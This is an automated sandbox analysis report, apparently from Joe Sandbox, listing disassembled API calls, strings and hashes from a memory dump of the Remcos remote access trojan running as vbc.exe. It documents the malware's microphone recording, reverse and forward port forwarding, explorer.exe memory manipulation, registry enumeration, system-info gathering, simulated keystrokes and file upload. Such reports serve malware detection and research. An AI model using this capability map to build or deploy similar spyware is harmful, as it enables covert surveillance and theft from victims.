                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                    • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                    • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                    • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                    APIs
                    • _free.LIBCMT ref: 00448135
                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                    • _free.LIBCMT ref: 00448141
                    • _free.LIBCMT ref: 0044814C
                    • _free.LIBCMT ref: 00448157
                    • _free.LIBCMT ref: 00448162
                    • _free.LIBCMT ref: 0044816D
                    • _free.LIBCMT ref: 00448178
                    • _free.LIBCMT ref: 00448183
                    • _free.LIBCMT ref: 0044818E
                    • _free.LIBCMT ref: 0044819C
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                    • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                    • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                    • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Eventinet_ntoa
                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                    • API String ID: 3578746661-3604713145
                    • Opcode ID: a7bd2cf574d9c29f0f452118638ed50856907e78b238ba203f6b8faaf9cf41f8
                    • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                    • Opcode Fuzzy Hash: a7bd2cf574d9c29f0f452118638ed50856907e78b238ba203f6b8faaf9cf41f8
                    • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                    APIs
                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: DecodePointer
                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                    • API String ID: 3527080286-3064271455
                    • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                    • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                    • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                    • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                    APIs
                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                    • __fassign.LIBCMT ref: 0044B479
                    • __fassign.LIBCMT ref: 0044B494
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
                    • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                    • String ID: PkGNG
                    • API String ID: 1324828854-263838557
                    • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                    • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                    • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                    • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                    • Sleep.KERNEL32(00000064), ref: 00417521
                    • DeleteFileW.KERNEL32(00000000), ref: 00417555
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CreateDeleteExecuteShellSleep
                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                    • API String ID: 1462127192-2001430897
                    • Opcode ID: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                    • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                    • Opcode Fuzzy Hash: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                    • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                    APIs
                    • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                    • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe), ref: 0040749E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentProcess
                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                    • API String ID: 2050909247-4242073005
                    • Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                    • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                    • Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                    • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                    APIs
                    • _strftime.LIBCMT ref: 00401D50
                      • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                    • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                    • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                    • API String ID: 3809562944-243156785
                    • Opcode ID: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                    • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                    • Opcode Fuzzy Hash: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                    • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                    • int.LIBCPMT ref: 00410E81
                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                    • std::_Facet_Register.LIBCPMT ref: 00410EC1
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                    • __Init_thread_footer.LIBCMT ref: 00410F29
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                    • String ID: ,kG$0kG
                    • API String ID: 3815856325-2015055088
                    • Opcode ID: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                    • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                    • Opcode Fuzzy Hash: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                    • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                    APIs
                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                    • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                    • waveInStart.WINMM ref: 00401CFE
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                    • String ID: dMG$|MG$PG
                    • API String ID: 1356121797-532278878
                    • Opcode ID: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
                    • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                    • Opcode Fuzzy Hash: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
                    • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                      • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                      • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                      • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                    • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                    • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                    • TranslateMessage.USER32(?), ref: 0041D4E9
                    • DispatchMessageA.USER32(?), ref: 0041D4F3
                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                    • String ID: Remcos
                    • API String ID: 1970332568-165870891
                    • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                    • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                    • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                    • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                    • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                    • Opcode Fuzzy Hash: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                    • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • _memcmp.LIBVCRUNTIME ref: 00445423
                    • _free.LIBCMT ref: 00445494
                    • _free.LIBCMT ref: 004454AD
                    • _free.LIBCMT ref: 004454DF
                    • _free.LIBCMT ref: 004454E8
                    • _free.LIBCMT ref: 004454F4
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorLast$_abort_memcmp
                    • String ID: C
                    • API String ID: 1679612858-1037565863
                    • Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                    • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                    • Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                    • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: tcp$udp
                    • API String ID: 0-3725065008
                    • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                    • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                    • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                    • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                    APIs
                      • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                    • SetLastError.KERNEL32(000000C1,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                    • GetNativeSystemInfo.KERNEL32(?,?,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                    • SetLastError.KERNEL32(0000000E), ref: 00411DC9
                      • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,00411DE7,?,00000000,00003000,00000040,00000000), ref: 00411CB3
                    • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00411E10
                    • HeapAlloc.KERNEL32(00000000), ref: 00411E17
                    • SetLastError.KERNEL32(0000045A), ref: 00411F2A
                      • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                      • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                    • String ID: t^F
                    • API String ID: 3950776272-389975521
                    • Opcode ID: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                    • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                    • Opcode Fuzzy Hash: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                    • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                    APIs
                    • __Init_thread_footer.LIBCMT ref: 004018BE
                    • ExitThread.KERNEL32 ref: 004018F6
                    • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                    • String ID: PkG$XMG$NG$NG
                    • API String ID: 1649129571-3151166067
                    • Opcode ID: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                    • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                    • Opcode Fuzzy Hash: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                    • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                    APIs
                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                      • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                      • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                    • String ID: .part
                    • API String ID: 1303771098-3499674018
                    • Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                    • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                    • Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                    • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                    APIs
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                    • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: InputSend
                    • String ID:
                    • API String ID: 3431551938-0
                    • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                    • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                    • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                    • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: __freea$__alloca_probe_16_free
                    • String ID: a/p$am/pm$zD
                    • API String ID: 2936374016-2723203690
                    • Opcode ID: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                    • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                    • Opcode Fuzzy Hash: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                    • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                    APIs
                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                    • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Enum$InfoQueryValue
                    • String ID: [regsplt]$xUG$TG
                    • API String ID: 3554306468-1165877943
                    • Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                    • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                    • Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                    • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: D[E$D[E
                    • API String ID: 269201875-3695742444
                    • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                    • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                    • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                    • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                    APIs
                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                      • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                      • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEnumInfoOpenQuerysend
                    • String ID: xUG$NG$NG$TG
                    • API String ID: 3114080316-2811732169
                    • Opcode ID: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                    • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                    • Opcode Fuzzy Hash: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                    • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                    • __alloca_probe_16.LIBCMT ref: 004511B1
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
                    • __freea.LIBCMT ref: 0045121D
